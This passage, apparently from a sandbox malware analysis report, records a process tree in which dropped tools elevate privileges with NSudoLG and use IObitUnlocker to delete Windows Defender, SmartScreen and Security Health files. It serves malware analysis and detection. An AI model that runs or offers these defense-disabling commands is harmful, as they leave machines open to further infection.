        cmd.exe /c ""C:\Temper\yPZgOUib.exe" x -aoa -bso0 -bsp1 "C:\Temper\BkzB8hMl.zip" -pbQUUfQ9U -o"C:\Temper""
        7⤵
        
        PID:4728
        
        C:\Temper\yPZgOUib.exe
        
        "C:\Temper\yPZgOUib.exe" x -aoa -bso0 -bsp1 "C:\Temper\BkzB8hMl.zip" -pbQUUfQ9U -o"C:\Temper"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4596
        
        C:\Temper\ggWoUHI3.exe
        
        "C:\Temper\ggWoUHI3.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4384
        
        C:\Temper\qGkirdNH.exe
        
        "C:\Temper\qGkirdNH.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LPz2UYJ.bat" "
        8⤵
        
        PID:3356
        
        C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe
        
        nircmd win min process "cmd.exe"
        9⤵
        Executes dropped EXE
        
        PID:3280
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        9⤵
        
        PID:4584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKU\S-1-5-19"
        9⤵
        
        PID:316
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
        9⤵
        Modifies data under HKEY_USERS
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe
        
        NSudoLG -U:T -P:E -UseCurrentConsole "C:\Users\Admin\AppData\Local\Temp\LPz2UYJ.bat" any_word
        9⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4860
        
        C:\Windows\SysWOW64\mode.com
        
        Mode 79,49
        9⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        9⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2404
        
        C:\Windows\SysWOW64\find.exe
        
        find /i "0x0"
        9⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist
        9⤵
        
        PID:4844
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        10⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
        9⤵
        
        PID:4856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
        9⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\Sense"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
        9⤵
        
        PID:456
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
        9⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
        9⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
        9⤵
        
        PID:2580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
        9⤵
        
        PID:1188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
        9⤵
        
        PID:4012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
        9⤵
        
        PID:112
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
        9⤵
        
        PID:2824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
        9⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
        9⤵
        
        PID:4460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
        9⤵
        
        PID:404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKLM\System\CurrentControlset\Services\WdFilter
        9⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
        9⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\find.exe
        
        find /i "Windows 7"
        9⤵
        
        PID:4716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ver "
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2168
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"6.1.7601"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\Work\7z.exe
        
        7z x -aoa -bso0 -bsp1 "DKT.zip" -p"DDK" "Unlocker.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1148
        
        C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
        
        Unlocker /CurrentDiskSize
        9⤵
        Sets service image path in registry
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2316
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
        10⤵
        
        PID:2544
        
        C:\Windows\system32\sc.exe
        
        sc query IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:4932
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
        10⤵
        
        PID:1740
        
        C:\Windows\system32\sc.exe
        
        sc stop IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:3236
        
        C:\Windows\system32\sc.exe
        
        sc delete IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:1776
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "2316"
        10⤵
        
        PID:2548
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:1176
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /pid "2316"
        11⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164
        
        C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
        
        Unlocker /dеlwd
        9⤵
        Sets service image path in registry
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3912
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
        10⤵
        
        PID:2356
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:4812
        
        C:\Windows\system32\sc.exe
        
        sc query IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:2316
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
        10⤵
        
        PID:3336
        
        C:\Windows\system32\sc.exe
        
        sc stop IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:4420
        
        C:\Windows\system32\sc.exe
        
        sc delete IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:5108
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "3912"
        10⤵
        
        PID:1824
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /pid "3912"
        11⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2 /nobreak
        9⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2628
        
        C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
        
        Unlocker /DеlWD
        9⤵
        Sets service image path in registry
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:212
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
        10⤵
        
        PID:4732
        
        C:\Windows\system32\sc.exe
        
        sc query IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:1988
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1432
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:3280
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 